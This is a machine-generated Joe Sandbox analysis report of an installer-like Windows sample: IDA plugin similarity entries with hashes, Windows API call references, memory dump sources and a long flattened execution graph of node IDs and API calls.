                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide$AllocString
                                                                                                      • String ID:
                                                                                                      • API String ID: 262959230-0
                                                                                                      • Opcode ID: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
                                                                                                      • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                                                                      • Opcode Fuzzy Hash: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
                                                                                                      • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(00000000,0040A60E), ref: 004030E3
                                                                                                      • GetCommandLineA.KERNEL32(00000000,0040A60E), ref: 004030EE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CommandHandleLineModule
                                                                                                      • String ID: H%o$U1hd.@
                                                                                                      • API String ID: 2123368496-2799989109
                                                                                                      • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                                      • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                                                                      • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                                      • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                                                                      APIs
                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,00409918,00000000), ref: 00406E4C
                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: QueryValue
                                                                                                      • String ID: )q@
                                                                                                      • API String ID: 3660427363-2284170586
                                                                                                      • Opcode ID: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
                                                                                                      • Instruction ID: 22a93fbabe645b78fd14ced98f65bd4bcb22fe3fd6f8222f7fa8e6a3c98f8dfc
                                                                                                      • Opcode Fuzzy Hash: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
                                                                                                      • Instruction Fuzzy Hash: E6415E31D0021AAFDB21DF95C881BAFB7B8EB04704F56447AE901F7280D738AF108B99
                                                                                                      APIs
                                                                                                      • MessageBoxA.USER32(00000000,00000000,Setup,00000010), ref: 00409CBD
                                                                                                      Strings
                                                                                                      • Setup, xrefs: 00409CAD
                                                                                                      • The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si, xrefs: 00409CA1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Message
                                                                                                      • String ID: Setup$The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si
                                                                                                      • API String ID: 2030045667-3271211647
                                                                                                      • Opcode ID: bc66b1cf8cea732a030952d466b76090b354ad7a58696f118c0a4b0261ee3717
                                                                                                      • Instruction ID: b8b600ed6bdfe48e96a015bdf4867c85bc36f5512d0f27a60c0f94c744360238
                                                                                                      • Opcode Fuzzy Hash: bc66b1cf8cea732a030952d466b76090b354ad7a58696f118c0a4b0261ee3717
                                                                                                      • Instruction Fuzzy Hash: 8EE0E5302482087EE311EA528C13F6A7BACE789B04F600477F900B15C3D6786E00A068
                                                                                                      APIs
                                                                                                      • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 004094F7
                                                                                                      • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 00409507
                                                                                                      • GetLastError.KERNEL32(?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 0040951A
                                                                                                      • GetLastError.KERNEL32(?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 00409524
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1458359878-0
                                                                                                      • Opcode ID: 97bb3b87fdda019371420e794be163fcf62410a15a23215566f33b90e6dc6563
                                                                                                      • Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
                                                                                                      • Opcode Fuzzy Hash: 97bb3b87fdda019371420e794be163fcf62410a15a23215566f33b90e6dc6563
                                                                                                      • Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:16%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:4.6%
                                                                                                      Total number of Nodes:2000
                                                                                                      Total number of Limit Nodes:87
403450 18 API calls 50664->50665 50666 48311a 50665->50666 50667 469868 SendMessageA 50666->50667 50668 483133 50667->50668 50669 483184 50668->50669 52017 479e18 37 API calls 50668->52017 51846 4241dc IsIconic 50669->51846 50673 48319f SetActiveWindow 50674 4831b4 50673->50674 51854 4824b4 50674->51854 50723->50419 50724->50421 50725->50421 50726->50421 53670 43d9c8 50727->53670 50730 494dcc 53675 431bd0 50730->53675 50731 494e52 50732 494e61 50731->50732 53708 4945c8 18 API calls 50731->53708 50732->50438 50741 494e16 53706 49465c 18 API calls 50741->53706 50743 494e2a 53707 433dd0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50743->53707 50745 494e4a 50745->50438 50746->50429 50748 457f41 50747->50748 50749 457f61 50748->50749 50750 4078f4 33 API calls 50748->50750 50751 403400 4 API calls 50749->50751 50752 457f59 50750->50752 50753 457f76 50751->50753 50754 457d10 38 API calls 50752->50754 50753->50448 50754->50749 50763->50438 50789 46c4bc 50764->50789 50767 414ae8 50768 414af6 50767->50768 50769 4034e0 18 API calls 50768->50769 50770 414b03 50769->50770 50770->50465 50771->50478 50773 46661a 50772->50773 50992 4078f4 50773->50992 51035 42cccc 50781->51035 50784 451458 50785 451428 18 API calls 50784->50785 50786 451474 50785->50786 50787 47efd0 56 API calls 50786->50787 50787->50474 50788->50467 50790 414ae8 18 API calls 50789->50790 50791 46c4f0 50790->50791 50850 466898 50791->50850 50795 46c502 50796 46c511 50795->50796 50799 46c52a 50795->50799 50919 47efd0 56 API calls 50796->50919 50798 403420 4 API calls 50801 46b702 50798->50801 50800 46c571 50799->50800 50802 46c558 50799->50802 50803 46c5d6 50800->50803 50808 46c575 50800->50808 50801->50462 50801->50767 50920 47efd0 56 API calls 50802->50920 50922 42cb4c CharNextA 50803->50922 50806 46c5e5 50807 46c5e9 50806->50807 50812 46c602 50806->50812 50923 47efd0 56 API calls 50807->50923 50810 46c5bd 50808->50810 50808->50812 50921 47efd0 56 API calls 50810->50921 50811 46c626 50924 47efd0 56 API calls 
50811->50924 50812->50811 50864 466a08 50812->50864 50817 46c525 50817->50798 50820 46c63f 50872 403778 50820->50872 50825 46c666 50925 466a94 18 API calls 50825->50925 50826 46c697 50883 42c8cc 50826->50883 50829 46c679 50831 451458 18 API calls 50829->50831 50833 46c686 50831->50833 50926 47efd0 56 API calls 50833->50926 50855 4668b2 50850->50855 50851 406bb0 18 API calls 50851->50855 50853 42cbc0 20 API calls 50853->50855 50854 403450 18 API calls 50854->50855 50855->50851 50855->50853 50855->50854 50856 4668fb 50855->50856 50929 42caac 50855->50929 50857 403420 4 API calls 50856->50857 50858 466915 50857->50858 50859 414b18 50858->50859 50860 414ae8 18 API calls 50859->50860 50861 414b3c 50860->50861 50862 403400 4 API calls 50861->50862 50863 414b6d 50862->50863 50863->50795 50865 466a12 50864->50865 50866 466a25 50865->50866 50945 42cb3c CharNextA 50865->50945 50866->50811 50868 466a38 50866->50868 50869 466a42 50868->50869 50870 466a6f 50869->50870 50946 42cb3c CharNextA 50869->50946 50870->50811 50870->50820 50873 4037aa 50872->50873 50874 40377d 50872->50874 50875 403400 4 API calls 50873->50875 50874->50873 50876 403791 50874->50876 50878 4037a0 50875->50878 50877 4034e0 18 API calls 50876->50877 50877->50878 50879 42c99c 50878->50879 50880 42c9b2 50879->50880 50881 42c9f5 50879->50881 50880->50881 50947 42cb3c CharNextA 50880->50947 50881->50825 50881->50826 50948 42c674 50883->50948 50919->50817 50920->50817 50921->50817 50922->50806 50923->50817 50924->50817 50925->50829 50926->50817 50930 403494 4 API calls 50929->50930 50931 42cabc 50930->50931 50932 403744 18 API calls 50931->50932 50936 42caf2 50931->50936 50938 42c444 IsDBCSLeadByte 50931->50938 50932->50931 50934 42cb36 50934->50855 50936->50934 50939 4037b8 50936->50939 50944 42c444 IsDBCSLeadByte 50936->50944 50938->50931 50940 403744 18 API calls 50939->50940 50942 4037c6 50940->50942 50941 4037fc 50941->50936 50942->50941 50943 4038a4 18 API calls 50942->50943 50943->50941 50944->50936 
50945->50865 50946->50869 50947->50880 50951 42c67c 50948->50951 50950 42c67b 50954 42c68d 50951->50954 50952 42c6f1 50955 42c6ec 50952->50955 50959 42c444 IsDBCSLeadByte 50952->50959 50954->50952 50957 42c6ab 50954->50957 50955->50950 50957->50955 50958 42c444 IsDBCSLeadByte 50957->50958 50958->50957 50959->50955 50995 407908 50992->50995 50996 407925 50995->50996 51003 4075b8 50996->51003 50999 407951 51001 4034e0 18 API calls 50999->51001 51002 407903 51001->51002 51002->50485 51006 4075d3 51003->51006 51004 4075e5 51004->50999 51008 4069a0 19 API calls 51004->51008 51006->51004 51009 4076da 33 API calls 51006->51009 51010 4075ac LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51006->51010 51008->50999 51009->51006 51010->51006 51036 42cbc0 20 API calls 51035->51036 51037 42ccee 51036->51037 51038 42ccf6 GetFileAttributesA 51037->51038 51039 403400 4 API calls 51038->51039 51040 42cd13 51039->51040 51040->50474 51040->50784 51041->50502 51044 46a787 51042->51044 51043 46abff 51046 46ac1a 51043->51046 51047 46ac4b 51043->51047 51044->51043 51045 46a842 51044->51045 51048 403494 4 API calls 51044->51048 51051 46a863 51045->51051 51052 46a8a4 51045->51052 51049 403494 4 API calls 51046->51049 51050 403494 4 API calls 51047->51050 51054 46a7c6 51048->51054 51055 46ac28 51049->51055 51056 46ac59 51050->51056 51053 403494 4 API calls 51051->51053 51060 403400 4 API calls 51052->51060 51057 46a871 51053->51057 51058 414ae8 18 API calls 51054->51058 51154 46915c 26 API calls 51055->51154 51155 46915c 26 API calls 51056->51155 51062 414ae8 18 API calls 51057->51062 51063 46a7e7 51058->51063 51064 46a8a2 51060->51064 51066 46a892 51062->51066 51128 403634 51063->51128 51084 46a988 51064->51084 51134 469868 51064->51134 51065 46ac36 51068 403400 4 API calls 51065->51068 51069 403634 18 API calls 51066->51069 51072 46ac7c 51068->51072 51069->51064 51077 403400 4 API calls 51072->51077 51073 46aa10 51075 403400 4 API calls 51073->51075 51080 46aa0e 51075->51080 51076 46a8c4 
51081 46a902 51076->51081 51082 46a8ca 51076->51082 51078 46ac84 51077->51078 51083 403420 4 API calls 51078->51083 51149 469ca4 57 API calls 51080->51149 51085 403400 4 API calls 51081->51085 51086 403494 4 API calls 51082->51086 51088 46ac91 51083->51088 51084->51073 51089 46a9cf 51084->51089 51090 46a900 51085->51090 51087 46a8d8 51086->51087 51140 47c26c 51087->51140 51088->50509 51094 403494 4 API calls 51089->51094 51143 469b5c 51090->51143 51098 46a9dd 51094->51098 51096 46aa39 51104 46aa44 51096->51104 51105 46aa9a 51096->51105 51097 46a8f0 51100 403634 18 API calls 51097->51100 51101 414ae8 18 API calls 51098->51101 51100->51090 51103 46a9fe 51101->51103 51106 403634 18 API calls 51103->51106 51108 403494 4 API calls 51104->51108 51107 403400 4 API calls 51105->51107 51106->51080 51114 46aaa2 51107->51114 51116 46aa52 51108->51116 51109 46a929 51110 46a934 51109->51110 51111 46a98a 51109->51111 51113 403494 4 API calls 51110->51113 51112 403400 4 API calls 51111->51112 51112->51084 51118 46a942 51113->51118 51126 46ab4b 51114->51126 51150 494c90 18 API calls 51114->51150 51116->51114 51120 403634 18 API calls 51116->51120 51122 46aa98 51116->51122 51117 46aac5 51117->51126 51151 494f3c 32 API calls 51117->51151 51118->51084 51121 403634 18 API calls 51118->51121 51120->51116 51121->51118 51122->51114 51124 46abec 51153 429144 SendMessageA SendMessageA 51124->51153 51152 4290f4 SendMessageA 51126->51152 51127->50510 51129 40363c 51128->51129 51130 4034bc 18 API calls 51129->51130 51131 40364f 51130->51131 51132 403450 18 API calls 51131->51132 51133 403677 51132->51133 51156 42a040 SendMessageA 51134->51156 51136 469877 51137 469897 51136->51137 51157 42a040 SendMessageA 51136->51157 51137->51076 51139 469887 51139->51076 51158 47c2b4 51140->51158 51147 469b89 51143->51147 51144 469beb 51145 403400 4 API calls 51144->51145 51146 469c00 51145->51146 51146->51109 51147->51144 51503 469ae0 57 API calls 51147->51503 51149->51096 51150->51117 51151->51126 
51152->51124 51153->51043 51154->51065 51155->51065 51156->51136 51157->51139 51159 403494 4 API calls 51158->51159 51166 47c2e7 51159->51166 51160 47c3f9 51161 403420 4 API calls 51160->51161 51162 47c289 51161->51162 51162->51097 51164 403778 18 API calls 51164->51166 51166->51160 51166->51164 51169 4037b8 18 API calls 51166->51169 51170 47b100 51166->51170 51414 453344 18 API calls 51166->51414 51415 403800 51166->51415 51419 42c97c CharPrevA 51166->51419 51169->51166 51171 47b152 51170->51171 51172 47b130 51170->51172 51173 47b172 51171->51173 51174 47b160 51171->51174 51172->51171 51424 47a030 33 API calls 51172->51424 51177 47b1d5 51173->51177 51178 47b180 51173->51178 51175 403494 4 API calls 51174->51175 51229 47b16d 51175->51229 51187 47b1f6 51177->51187 51188 47b1e3 51177->51188 51180 47b1af 51178->51180 51181 47b189 51178->51181 51179 403400 4 API calls 51182 47baf8 51179->51182 51184 47b1c2 51180->51184 51426 453344 18 API calls 51180->51426 51183 47b19c 51181->51183 51425 453344 18 API calls 51181->51425 51186 403400 4 API calls 51182->51186 51190 403494 4 API calls 51183->51190 51185 403494 4 API calls 51184->51185 51185->51229 51192 47bb00 51186->51192 51194 47b217 51187->51194 51195 47b204 51187->51195 51193 403494 4 API calls 51188->51193 51190->51229 51192->51166 51193->51229 51197 47b267 51194->51197 51198 47b225 51194->51198 51196 403494 4 API calls 51195->51196 51196->51229 51205 47b275 51197->51205 51206 47b288 51197->51206 51199 47b241 51198->51199 51200 47b22e 51198->51200 51202 47b254 51199->51202 51427 453344 18 API calls 51199->51427 51201 403494 4 API calls 51200->51201 51201->51229 51204 403494 4 API calls 51202->51204 51204->51229 51207 403494 4 API calls 51205->51207 51208 47b296 51206->51208 51209 47b2a9 51206->51209 51207->51229 51210 403494 4 API calls 51208->51210 51211 47b2b7 51209->51211 51212 47b2ca 51209->51212 51210->51229 51213 403494 4 API calls 51211->51213 51214 47b2eb 51212->51214 51215 47b2d8 51212->51215 51213->51229 
51217 47b327 51214->51217 51218 47b2f9 51214->51218 51216 403494 4 API calls 51215->51216 51216->51229 51223 47b335 51217->51223 51228 47b364 51217->51228 51219 47b315 51218->51219 51220 47b302 51218->51220 51222 47c26c 57 API calls 51219->51222 51221 403494 4 API calls 51220->51221 51221->51229 51222->51229 51224 47b351 51223->51224 51225 47b33e 51223->51225 51227 403494 4 API calls 51224->51227 51226 403494 4 API calls 51225->51226 51226->51229 51227->51229 51230 47b372 51228->51230 51231 47b3a0 51228->51231 51229->51179 51232 47b38e 51230->51232 51233 47b37b 51230->51233 51236 47b3ae 51231->51236 51237 47b3dd 51231->51237 51235 47c26c 57 API calls 51232->51235 51234 403494 4 API calls 51233->51234 51234->51229 51235->51229 51238 47b3b7 51236->51238 51239 47b3ca 51236->51239 51242 47b3fe 51237->51242 51243 47b3eb 51237->51243 51414->51166 51416 40382f 51415->51416 51417 403804 51415->51417 51416->51166 51418 4038a4 18 API calls 51417->51418 51418->51416 51419->51166 51424->51172 51425->51183 51426->51184 51427->51202 51503->51147 51505 47dd56 51504->51505 51506 47dd19 51504->51506 51505->50516 51536 455d0c 51506->51536 51510 47dd6d 51510->50516 51655 466714 51511->51655 51514->50524 51516 42f56c 51515->51516 51517 42f58f GetActiveWindow GetFocus 51516->51517 51518 41eea4 2 API calls 51517->51518 51519 42f5a6 51518->51519 51520 42f5c3 51519->51520 51521 42f5b3 RegisterClassA 51519->51521 51522 42f652 SetFocus 51520->51522 51523 42f5d1 CreateWindowExA 51520->51523 51521->51520 51524 403400 4 API calls 51522->51524 51523->51522 51525 42f604 51523->51525 51526 42f66e 51524->51526 51686 42427c 51525->51686 51531 494f3c 32 API calls 51526->51531 51528 42f62c 51529 42f634 CreateWindowExA 51528->51529 51529->51522 51530 42f64a ShowWindow 51529->51530 51530->51522 51531->50562 51692 44b514 51532->51692 51537 455d1d 51536->51537 51538 455d21 51537->51538 51539 455d2a 51537->51539 51562 455a10 51538->51562 51570 455af0 43 API calls 51539->51570 51542 455d27 51542->51505 
51543 47d970 51542->51543 51548 47da6c 51543->51548 51550 47d9b0 51543->51550 51544 403420 4 API calls 51545 47db4f 51544->51545 51545->51510 51555 47dabd 51548->51555 51558 47da0f 51548->51558 51625 479630 51548->51625 51550->51548 51551 47da18 51550->51551 51554 47c26c 57 API calls 51550->51554 51550->51558 51599 479770 51550->51599 51610 4798d4 51550->51610 51551->51550 51556 47c26c 57 API calls 51551->51556 51561 47da59 51551->51561 51614 42c92c 51551->51614 51619 42c954 51551->51619 51624 47d67c 66 API calls 51551->51624 51552 47c26c 57 API calls 51552->51555 51553 454100 34 API calls 51553->51555 51554->51550 51555->51548 51555->51552 51555->51553 51555->51561 51556->51551 51558->51544 51561->51558 51571 42de1c 51562->51571 51564 455a2d 51565 455a7b 51564->51565 51574 455944 51564->51574 51565->51542 51568 455944 20 API calls 51569 455a5c RegCloseKey 51568->51569 51569->51542 51570->51542 51572 42de27 51571->51572 51573 42de2d RegOpenKeyExA 51571->51573 51572->51573 51573->51564 51579 42dd58 51574->51579 51576 403420 4 API calls 51577 4559f6 51576->51577 51577->51568 51578 45596c 51578->51576 51582 42dc00 51579->51582 51583 42dc26 RegQueryValueExA 51582->51583 51588 42dc49 51583->51588 51598 42dc6b 51583->51598 51584 403400 4 API calls 51586 42dd37 51584->51586 51585 42dc63 51587 403400 4 API calls 51585->51587 51586->51578 51587->51598 51588->51585 51589 4034e0 18 API calls 51588->51589 51590 403744 18 API calls 51588->51590 51588->51598 51589->51588 51591 42dca0 RegQueryValueExA 51590->51591 51591->51583 51592 42dcbc 51591->51592 51593 4038a4 18 API calls 51592->51593 51592->51598 51594 42dcfe 51593->51594 51595 42dd10 51594->51595 51597 403744 18 API calls 51594->51597 51596 403450 18 API calls 51595->51596 51596->51598 51597->51595 51598->51584 51600 479786 51599->51600 51601 479782 51599->51601 51602 403450 18 API calls 51600->51602 51601->51550 51603 479793 51602->51603 51604 4797b3 51603->51604 51605 479799 51603->51605 51607 479630 33 API calls 
51604->51607 51606 479630 33 API calls 51605->51606 51608 4797af 51606->51608 51607->51608 51609 403400 4 API calls 51608->51609 51609->51601 51611 4798e0 51610->51611 51612 4798fb 51611->51612 51637 453344 18 API calls 51611->51637 51612->51550 51638 42c79c 51614->51638 51617 403778 18 API calls 51618 42c94e 51617->51618 51618->51551 51620 42c79c IsDBCSLeadByte 51619->51620 51621 42c964 51620->51621 51622 403778 18 API calls 51621->51622 51623 42c975 51622->51623 51623->51551 51624->51551 51626 47964b 51625->51626 51629 47967c 51626->51629 51636 47970a 51626->51636 51650 4794e4 33 API calls 51626->51650 51627 4796a1 51632 4796c2 51627->51632 51652 4794e4 33 API calls 51627->51652 51629->51627 51651 4794e4 33 API calls 51629->51651 51633 479702 51632->51633 51632->51636 51653 453344 18 API calls 51632->51653 51644 479368 51633->51644 51636->51548 51637->51612 51639 42c67c IsDBCSLeadByte 51638->51639 51641 42c7b1 51639->51641 51640 42c7fb 51640->51617 51641->51640 51643 42c444 IsDBCSLeadByte 51641->51643 51643->51641 51645 4793a3 51644->51645 51646 403450 18 API calls 51645->51646 51647 4793c8 51646->51647 51654 477a58 33 API calls 51647->51654 51649 479409 51649->51636 51650->51629 51651->51627 51652->51632 51653->51633 51654->51649 51656 403494 4 API calls 51655->51656 51657 466742 51656->51657 51672 42dbc8 51657->51672 51660 42dbc8 19 API calls 51661 466766 51660->51661 51662 466600 33 API calls 51661->51662 51663 466770 51662->51663 51664 42dbc8 19 API calls 51663->51664 51665 46677f 51664->51665 51675 466678 51665->51675 51668 42dbc8 19 API calls 51669 466798 51668->51669 51670 403400 4 API calls 51669->51670 51671 4667ad 51670->51671 51671->50520 51679 42db10 51672->51679 51676 466698 51675->51676 51677 4078f4 33 API calls 51676->51677 51678 4666e2 51677->51678 51678->51668 51680 42db30 51679->51680 51681 42dbbb 51679->51681 51680->51681 51682 4037b8 18 API calls 51680->51682 51684 403800 18 API calls 51680->51684 51685 42c444 IsDBCSLeadByte 51680->51685 
51681->51660 51682->51680 51684->51680 51685->51680 51687 4242ae 51686->51687 51688 42428e GetWindowTextA 51686->51688 51690 403494 4 API calls 51687->51690 51689 4034e0 18 API calls 51688->51689 51691 4242ac 51689->51691 51690->51691 51691->51528 51695 44b38c 51692->51695 51696 44b3bf 51695->51696 51697 414ae8 18 API calls 51696->51697 51698 44b3d2 51697->51698 51699 44b3ff GetDC 51698->51699 51700 40357c 18 API calls 51698->51700 51706 41a1e8 51699->51706 51700->51699 51703 44b430 51714 44b0c0 51703->51714 51707 41a213 51706->51707 51708 41a2af 51706->51708 51725 403520 51707->51725 51709 403400 4 API calls 51708->51709 51710 41a2c7 SelectObject 51709->51710 51710->51703 51712 41a26b 51713 41a2a3 CreateFontIndirectA 51712->51713 51713->51708 51715 44b0d7 51714->51715 51726 4034e0 18 API calls 51725->51726 51727 40352a 51726->51727 51727->51712 51731 4652d7 51728->51731 51729 4653b2 51739 46708c 51729->51739 51730 46536a 51730->51729 51757 4185b8 21 API calls 51730->51757 51731->51729 51734 465327 51731->51734 51751 421a1c 51731->51751 51734->51730 51735 465361 51734->51735 51736 46536c 51734->51736 51737 421a1c 21 API calls 51735->51737 51738 421a1c 21 API calls 51736->51738 51737->51730 51738->51730 51740 4670bc 51739->51740 51741 46709d 51739->51741 51740->50581 51742 414b18 18 API calls 51741->51742 51743 4670ab 51742->51743 51744 414b18 18 API calls 51743->51744 51744->51740 51752 421a74 51751->51752 51754 421a2a 51751->51754 51752->51734 51753 421a59 51753->51752 51766 421d28 SetFocus GetFocus 51753->51766 51754->51753 51758 408cbc 51754->51758 51757->51729 51759 408cc8 51758->51759 51767 406dec LoadStringA 51759->51767 51762 403450 18 API calls 51763 408cf9 51762->51763 51764 403400 4 API calls 51763->51764 51765 408d0e 51764->51765 51765->51753 51766->51752 51768 4034e0 18 API calls 51767->51768 51769 406e19 51768->51769 51769->51762 51818 46c7a5 51817->51818 51819 414ae8 18 API calls 51818->51819 51834 46c7f2 51818->51834 51820 46c7bb 51819->51820 52024 
466924 20 API calls 51820->52024 51821 403420 4 API calls 51823 46c89c 51821->51823 51823->50661 52016 408be0 19 API calls 51823->52016 51824 46c7c3 51825 414b18 18 API calls 51824->51825 51826 46c7d1 51825->51826 51827 46c7de 51826->51827 51829 46c7f7 51826->51829 52025 47efd0 56 API calls 51827->52025 51830 46c80f 51829->51830 51832 466a08 CharNextA 51829->51832 52026 47efd0 56 API calls 51830->52026 51833 46c80b 51832->51833 51833->51830 51835 46c825 51833->51835 51834->51821 51836 46c841 51835->51836 51837 46c82b 51835->51837 51839 42c99c CharNextA 51836->51839 52027 47efd0 56 API calls 51837->52027 51840 46c84e 51839->51840 51840->51834 52028 466a94 18 API calls 51840->52028 51842 46c865 51843 451458 18 API calls 51842->51843 51844 46c872 51843->51844 52029 47efd0 56 API calls 51844->52029 51847 4241ed SetActiveWindow 51846->51847 51851 424223 51846->51851 52030 42364c 51847->52030 51851->50673 51851->50674 51852 42420a 51852->51851 51853 42421d SetFocus 51852->51853 51853->51851 51855 482505 51854->51855 51856 4824d7 51854->51856 51858 475bd0 51855->51858 52043 494cec 32 API calls 51856->52043 52044 457d10 51858->52044 51862 475c26 52017->50669 52024->51824 52025->51834 52026->51834 52027->51834 52028->51842 52029->51834 52039 4235f8 SystemParametersInfoA 52030->52039 52033 423665 ShowWindow 52035 423670 52033->52035 52036 423677 52033->52036 52042 423628 SystemParametersInfoA 52035->52042 52038 423b14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 52036->52038 52038->51852 52040 423616 52039->52040 52040->52033 52041 423628 SystemParametersInfoA 52040->52041 52041->52033 52042->52036 52043->51855 52045 457e44 52044->52045 52046 457d3c 52044->52046 52047 457e95 52045->52047 52520 45757c 20 API calls 52045->52520 52516 457a0c GetSystemTimeAsFileTime FileTimeToSystemTime 52046->52516 52050 403400 4 API calls 52047->52050 52052 457eaa 52050->52052 52051 457d44 52053 4078f4 33 API calls 52051->52053 52065 4072a8 52052->52065 52054 457db5 52053->52054 
52517 457d00 34 API calls 52054->52517 52056 403778 18 API calls 52060 457dbd 52056->52060 52057 457e0b 52060->52056 52060->52057 52061 457d00 34 API calls 52060->52061 52061->52060 52066 403738 52065->52066 52067 4072b2 SetCurrentDirectoryA 52066->52067 52067->51862 52516->52051 52517->52060 52520->52047 53709 431eec 53670->53709 53672 43d9f2 53673 403400 4 API calls 53672->53673 53674 43da76 53673->53674 53674->50730 53674->50731 53676 431bd6 53675->53676 53677 402648 18 API calls 53676->53677 53678 431c06 53677->53678 53679 4947f8 53678->53679 53680 4948cd 53679->53680 53681 494812 53679->53681 53686 494910 53680->53686 53681->53680 53683 433d6c 18 API calls 53681->53683 53685 403450 18 API calls 53681->53685 53714 408c0c 18 API calls 53681->53714 53715 431ca0 53681->53715 53683->53681 53685->53681 53687 49492c 53686->53687 53723 433d6c 53687->53723 53689 494931 53690 431ca0 18 API calls 53689->53690 53691 49493c 53690->53691 53692 43d594 53691->53692 53693 43d5c1 53692->53693 53694 43d5b3 53692->53694 53693->50741 53694->53693 53695 43d63d 53694->53695 53699 447084 18 API calls 53694->53699 53702 43d6f7 53695->53702 53726 447084 53695->53726 53697 43d688 53732 43dd50 53697->53732 53699->53694 53700 43d8fd 53700->53693 53752 447024 18 API calls 53700->53752 53702->53700 53703 43d8de 53702->53703 53750 447024 18 API calls 53702->53750 53751 447024 18 API calls 53703->53751 53706->50743 53707->50745 53708->50732 53710 403494 4 API calls 53709->53710 53712 431efb 53710->53712 53711 431f25 53711->53672 53712->53711 53713 403744 18 API calls 53712->53713 53713->53712 53714->53681 53716 431cc0 53715->53716 53717 431cae 53715->53717 53719 431ce2 53716->53719 53722 431c40 18 API calls 53716->53722 53721 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53717->53721 53719->53681 53721->53716 53722->53719 53724 402648 18 API calls 53723->53724 53725 433d7b 